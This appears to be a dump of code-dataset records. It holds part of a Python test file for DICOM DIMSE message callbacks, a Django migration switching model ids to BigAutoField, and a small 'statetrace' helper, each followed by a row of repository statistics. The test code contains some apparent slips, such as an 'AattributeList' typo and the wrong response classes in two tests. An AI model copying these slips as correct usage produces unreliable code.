# -RSP
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
def test_callback(msg):
"""Callback"""
assert msg.__class__.__name__ == cls_name[1]
self.dimse.on_send_dimse_message = test_callback
self.dimse.send_msg(primitive, 1)
# Receive tests
def test_receive_timeout(self):
"""Test the DIMSE timeout on Receive works"""
pass
def test_receive_c_echo(self):
"""Check receiving DIMSE C-ECHO messages."""
pass
def test_receive_c_store(self):
"""Check receiving DIMSE C-STORE messages."""
pass
def test_receive_c_find(self):
"""Check receiving DIMSE C-FIND messages."""
pass
def test_receive_c_get(self):
"""Check receiving DIMSE C-GET messages."""
pass
def test_receive_c_move(self):
"""Check receiving DIMSE C-MOVE messages."""
pass
def test_receive_n_event_report(self):
"""Check receiving DIMSE N-EVENT-REPORT messages."""
pass
def test_receive_n_get(self):
"""Check receiving DIMSE N-GET messages."""
pass
def test_receive_n_set(self):
"""Check receiving DIMSE N-SET messages."""
pass
def test_receive_n_action(self):
"""Check receiving DIMSE N-ACTION messages."""
pass
def test_receive_n_create(self):
"""Check receiving DIMSE N-CREATE messages."""
pass
def test_receive_n_delete(self):
"""Check receiving DIMSE N-DELETE messages."""
pass
class TestDIMSEProviderCallbacks(object):
"""Test the callbacks for the DIMSE Service"""
def setup(self):
"""Set up"""
self.dimse = DIMSEServiceProvider(DummyDUL(), 1)
def test_callback_send_c_echo(self):
"""Check callback for sending DIMSE C-ECHO messages."""
# C-ECHO-RQ
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
self.dimse.send_msg(primitive, 1)
# C-ECHO-RSP
primitive = C_ECHO()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_store(self):
"""Check callback for sending DIMSE C-STORE messages."""
# C-STORE-RQ
primitive = C_STORE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2' # CT
primitive.AffectedSOPInstanceUID = '1.1.2'
primitive.Priority = 0x02
primitive.DataSet = BytesIO()
# CT + no dataset
self.dimse.send_msg(primitive, 1)
primitive.AffectedSOPClassUID = '1.1.1'
# No UID type, no dataset
# MR + dataset
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.4' # MR
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.DataSet = bytestream
self.dimse.send_msg(primitive, 1)
# C-STORE-RSP
primitive = C_STORE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_find(self):
"""Check callback for sending DIMSE C-FIND messages."""
# C-FIND-RQ
primitive = C_FIND()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.Priority = 0x02
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-FIND-RSP
primitive = C_FIND()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
primitive.AffectedSOPClassUID = '1.1.1'
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
primitive.Status = 0xFF00 # Only has dataset when 0xFF00 or 0xFF01
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_get(self):
"""Check callback for sending DIMSE C-GET messages."""
# C-GET-RQ
primitive = C_GET()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-GET-RSP
primitive = C_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
primitive.Identifier = BytesIO()
# No dataset
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
def test_callback_send_c_move(self):
"""Check callback for sending DIMSE C-MOVE messages."""
# C-MOVE-RQ
primitive = C_MOVE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.MoveDestination = b'TESTSCP'
# No dataset
primitive.Identifier = BytesIO()
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
# C-MOVE-RSP
primitive = C_MOVE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
# No dataset
primitive.Identifier = BytesIO()
self.dimse.send_msg(primitive, 1)
# Dataset
bytestream = BytesIO()
bytestream.write(c_store_ds)
primitive.Identifier = bytestream
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_event_report(self):
"""Check callback for sending DIMSE N-EVENT-REPORT messages."""
# N-EVENT-REPORT-RQ
primitive = N_EVENT_REPORT()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1'
primitive.EventTypeID = 2
self.dimse.send_msg(primitive, 1)
# User defined
primitive.EventInformation = BytesIO(n_er_rq_ds)
self.dimse.send_msg(primitive, 1)
# N-EVENT-REPORT-RSP
primitive = N_EVENT_REPORT()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.EventTypeID = 4
primitive.EventReply = BytesIO(n_er_rsp_ds)
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_get(self):
"""Check callback for sending DIMSE N-GET messages."""
# N-GET-RQ
primitive = N_GET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
self.dimse.send_msg(primitive, 1)
# Plus user defined
primitive.AttributeIdentifierList = [(0x0000, 0x0000), (0xffff, 0xffff)]
self.dimse.send_msg(primitive, 1)
# N-GET-RSP
# Mandatory elements
primitive = N_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
self.dimse.send_msg(primitive, 1)
# Conditional
primitive.AttributeList = BytesIO(n_get_rsp_ds)
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_set(self):
"""Check callback for sending DIMSE N-SET messages."""
# N-SET-RQ
primitive = N_SET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-SET-RSP
primitive = N_SET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_action(self):
"""Check callback for sending DIMSE N-ACTION messages."""
# N-ACTION-RQ
primitive = N_ACTION()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.2'
primitive.ActionTypeID = 5
self.dimse.send_msg(primitive, 1)
# User defined
primitive.ActionInformation = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-ACTION-RSP
primitive = N_ACTION()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# User defined
primitive.ActionTypeID = 5
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.ActionReply = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_create(self):
"""Check callback for sending DIMSE N-CREATE messages."""
# N-CREATE-RQ
primitive = N_CREATE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
self.dimse.send_msg(primitive, 1)
# User defined
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.AttributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
# N-CREATE-RSP
primitive = N_CREATE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
primitive.AffectedSOPClassUID = '1.2'
primitive.AffectedSOPInstanceUID = '1.2.3'
primitive.AattributeList = BytesIO(b'\x00\x01')
self.dimse.send_msg(primitive, 1)
def test_callback_send_n_delete(self):
"""Check callback for sending DIMSE N-DELETE messages."""
# N-DELETE-RQ
primitive = N_DELETE()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.2.3'
self.dimse.send_msg(primitive, 1)
# N-DELETE-RSP
# No affected SOP class/instance
primitive = N_DELETE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
self.dimse.send_msg(primitive, 1)
# Affected SOP Class
primitive.AffectedSOPClassUID = '1.1.2'
self.dimse.send_msg(primitive, 1)
# Affected SOP Instance
primitive.AffectedSOPInstanceUID = '1.1.3'
self.dimse.send_msg(primitive, 1)
# Receive
def test_callback_receive_c_echo(self):
"""Check callback for receiving DIMSE C-ECHO messages."""
# C-ECHO-RQ
primitive = C_ECHO()
primitive.MessageID = 7
primitive.Priority = 0x02
msg = C_ECHO_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_c_echo_rq(msg)
# C-ECHO-RSP
primitive = C_ECHO()
primitive.MessageIDBeingRespondedTo = 4
primitive.Status = 0x0000
msg = C_ECHO_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_echo_rsp(msg)
def test_callback_receive_c_store(self):
"""Check callback for sending DIMSE C-STORE messages."""
# C-STORE-RQ
primitive = C_STORE()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.DataSet = BytesIO()
# No dataset
msg = C_STORE_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_store_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.DataSet = BytesIO(encode(ref_ds, True, True))
msg = C_STORE_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_store_rq(msg)
# C-STORE-RSP
primitive = C_STORE()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.DataSet = BytesIO()
# Check statuses + no dataset
for status in [0x0000, 0xb000, 0xb007, 0xb006, 0xa700, 0xa900, 0xc000]:
primitive.Status = status
msg = C_STORE_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_store_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
msg = C_STORE_RSP()
msg.primitive_to_message(primitive)
# Dataset
msg.data_set = BytesIO(encode(ref_ds, True, True))
self.dimse.debug_receive_c_store_rsp(msg)
def test_callback_receive_c_find(self):
"""Check callback for receiving DIMSE C-FIND messages."""
# C-FIND-RQ
primitive = C_FIND()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
msg = C_FIND_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_find_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_FIND_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_find_rq(msg)
# C-FIND-RSP
primitive = C_FIND()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
primitive.Status = 0x0000 # Must be for pending
msg = C_FIND_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_find_rsp(msg)
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_FIND_RSP()
msg.primitive_to_message(primitive)
# Dataset
msg.data_set = BytesIO(encode(ref_ds, True, True))
self.dimse.debug_receive_c_find_rsp(msg)
# Non-pending status
msg.data_set.Status = 0x0001
self.dimse.debug_receive_c_find_rsp(msg)
# C-CANCEL-FIND-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_c_get(self):
"""Check callback for receiving DIMSE C-GET messages."""
# C-GET-RQ
primitive = C_GET()
primitive.MessageID = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.Priority = 0x02
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
# No dataset
msg = C_GET_RQ()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_get_rq(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
msg = C_GET_RQ()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_get_rq(msg)
# C-GET-RSP
primitive = C_GET()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
primitive.NumberOfCompletedSuboperations = 1
primitive.NumberOfWarningSuboperations = 3
primitive.NumberOfFailedSuboperations = 4
# No dataset, remaining subops
primitive.Status = 0x0000 # Must be for pending
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_get_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
primitive.NumberOfRemainingSuboperations = 2
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_get_rsp(msg)
# C-CANCEL-GET-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_c_move(self):
"""Check callback for receiving DIMSE C-MOVE messages."""
# C-MOVE-RQ
msg = C_MOVE_RQ()
self.dimse.debug_receive_c_move_rq(msg)
# C-MOVE-RSP
primitive = C_MOVE()
primitive.MessageIDBeingRespondedTo = 7
primitive.AffectedSOPClassUID = '1.2.840.10008.5.1.4.1.1.2'
primitive.AffectedSOPInstanceUID = '1.2.392.200036.9116.2.6.1.48.' \
'1215709044.1459316254.522441'
primitive.MoveOriginatorApplicationEntityTitle = 'UNITTEST_SCP'
primitive.MoveOriginatorMessageID = 3
primitive.Identifier = BytesIO()
primitive.NumberOfCompletedSuboperations = 1
primitive.NumberOfWarningSuboperations = 3
primitive.NumberOfFailedSuboperations = 4
# No dataset, remaining subops
primitive.Status = 0x0000 # Must be for pending
msg = C_MOVE_RSP()
msg.primitive_to_message(primitive)
self.dimse.debug_receive_c_move_rsp(msg)
# Dataset
ref_ds = Dataset()
ref_ds.PatientID = 'Test1101'
ref_ds.PatientName = "Tube HeNe"
primitive.Identifier = BytesIO(encode(ref_ds, True, True))
primitive.NumberOfRemainingSuboperations = 2
msg = C_GET_RSP()
msg.primitive_to_message(primitive)
# Dataset
self.dimse.debug_receive_c_move_rsp(msg)
# C-CANCEL-MOVE-RQ
self.dimse.debug_receive_c_cancel_rq(msg)
def test_callback_receive_n_event_report(self):
"""Check callback for receiving DIMSE N-EVENT-REPORT messages."""
# N-EVENT-REPORT-RQ
primitive = N_EVENT_REPORT()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.EventTypeID = 5
msg = N_EVENT_REPORT_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rq(msg)
# User defined
primitive.EventInformation = BytesIO(n_er_rq_ds)
msg = N_EVENT_REPORT_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rq(msg)
# N-EVENT-REPORT-RSP
primitive = N_EVENT_REPORT()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 5
msg = N_EVENT_REPORT_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.2.3'
primitive.AffectedSOPInstanceUID = '1.2.3.4'
primitive.EventTypeID = 4
primitive.EventReply = BytesIO(n_er_rsp_ds)
msg = N_EVENT_REPORT_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_event_report_rsp(msg)
def test_callback_receive_n_get(self):
"""Check callback for receiving DIMSE N-GET messages."""
# N-GET-RQ
primitive = N_GET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
msg = N_GET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rq(msg)
# Plus user defined
primitive.AttributeIdentifierList = [(0x0000, 0x0000), (0xffff, 0xffff)]
msg = N_GET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rq(msg)
# N-GET-RSP
# Mandatory elements
primitive = N_GET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
# Conditional
primitive.AttributeList = BytesIO(n_get_rsp_ds)
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_get_rsp(msg)
def test_callback_receive_n_set(self):
"""Check callback for receiving DIMSE N-SET messages."""
# N-SET-RQ
primitive = N_SET()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(n_set_rq_ds)
msg = N_SET_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rq(msg)
# N-SET-RSP
primitive = N_SET()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_SET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.ModificationList = BytesIO(n_set_rsp_ds)
msg = N_GET_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_set_rsp(msg)
def test_callback_receive_n_action(self):
"""Check callback for receiving DIMSE N-ACTION messages."""
# N-ACTION-RQ
primitive = N_ACTION()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
primitive.ActionTypeID = 2
msg = N_ACTION_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rq(msg)
# User defined
primitive.ActionInformation = BytesIO(n_action_rq_ds)
msg = N_ACTION_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rq(msg)
# N-ACTION-RSP
primitive = N_ACTION()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_ACTION_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.ActionTypeID = 2
primitive.ActionReply = BytesIO(n_action_rsp_ds)
msg = N_ACTION_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_action_rsp(msg)
def test_callback_receive_n_create(self):
"""Check callback for receiving DIMSE N-CREATE messages."""
# N-CREATE-RQ
primitive = N_CREATE()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = '1.1.1'
msg = N_CREATE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rq(msg)
# User defined
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(n_create_rq_ds)
msg = N_CREATE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rq(msg)
# N-CREATE-RSP
primitive = N_CREATE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_CREATE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rsp(msg)
# User defined
primitive.AffectedSOPClassUID = '1.1.1'
primitive.AffectedSOPInstanceUID = '1.1.1.1'
primitive.AttributeList = BytesIO(n_create_rsp_ds)
msg = N_CREATE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_create_rsp(msg)
def test_callback_receive_n_delete(self):
"""Check callback for receiving DIMSE N-DELETE messages."""
# N-DELETE-RQ
primitive = N_DELETE()
primitive.MessageID = 1
primitive.RequestedSOPClassUID = '1.1.1'
primitive.RequestedSOPInstanceUID = '1.1.1.1'
msg = N_DELETE_RQ()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rq(msg)
# N-DELETE-RSP
primitive = N_DELETE()
primitive.MessageIDBeingRespondedTo = 1
primitive.Status = 0x0000
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
# User optional
primitive.AffectedSOPClassUID = '1.2.3'
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
primitive.AffectedSOPInstanceUID = '1.2.3.4'
msg = N_DELETE_RSP()
msg.primitive_to_message(primitive)
msg.ID = 1
self.dimse.debug_receive_n_delete_rsp(msg)
| 33.817486 | 80 | 0.633067 | 3,683 | 30,943 | 5.086614 | 0.056476 | 0.01153 | 0.008808 | 0.050443 | 0.893349 | 0.861909 | 0.823956 | 0.761557 | 0.702359 | 0.663179 | 0 | 0.045839 | 0.269592 | 30,943 | 914 | 81 | 33.854486 | 0.783063 | 0.115794 | 0 | 0.794165 | 0 | 0 | 0.053573 | 0.023103 | 0 | 0 | 0.009478 | 0.001094 | 0.004862 | 1 | 0.071313 | false | 0.02269 | 0.016207 | 0.003241 | 0.094003 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ca54001ed5a057efd202a00e5e74dce2903f796 | 2,772 | py | Python | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 2,020 | 2015-05-20T02:41:40.000Z | 2022-03-31T14:37:50.000Z | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 1,195 | 2015-05-19T15:28:11.000Z | 2022-03-31T16:56:16.000Z | tests/core/migrations/0009_auto_20211111_0807.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 680 | 2015-05-27T16:54:17.000Z | 2022-03-31T07:56:09.000Z | # Generated by Django 3.2.9 on 2021-11-11 08:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0008_auto_20190409_0846'),
]
operations = [
migrations.AlterField(
model_name='author',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='book',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='child',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entry',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='parent',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='person',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='role',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withdefault',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withdynamicdefault',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='withfloatfield',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 37.459459 | 111 | 0.598846 | 281 | 2,772 | 5.725979 | 0.177936 | 0.089497 | 0.186451 | 0.216283 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0.832194 | 0 | 0.015516 | 0.279221 | 2,772 | 73 | 112 | 37.972603 | 0.78979 | 0.016234 | 0 | 0.716418 | 1 | 0 | 0.062018 | 0.00844 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014925 | 0 | 0.059701 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
1cd87593b35686f688bbe671ba490c6d4792f6b4 | 238 | py | Python | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | polls/statetrace.py | SoCal-Software-Labs/statetrace-example-django | 59985af6f88cd5f35c80a5d911943723da20b4b9 | [
"MIT"
] | null | null | null | def action_meta(request):
return {"my custom action meta": {"arbitary json": 123}}
def session_meta(request):
return {"my custom session meta": {"some json": 456}}
def filter_func(request):
return request.method in ["POST"] | 26.444444 | 60 | 0.689076 | 33 | 238 | 4.878788 | 0.545455 | 0.242236 | 0.21118 | 0.236025 | 0.310559 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030303 | 0.168067 | 238 | 9 | 61 | 26.444444 | 0.782828 | 0 | 0 | 0 | 0 | 0 | 0.288703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
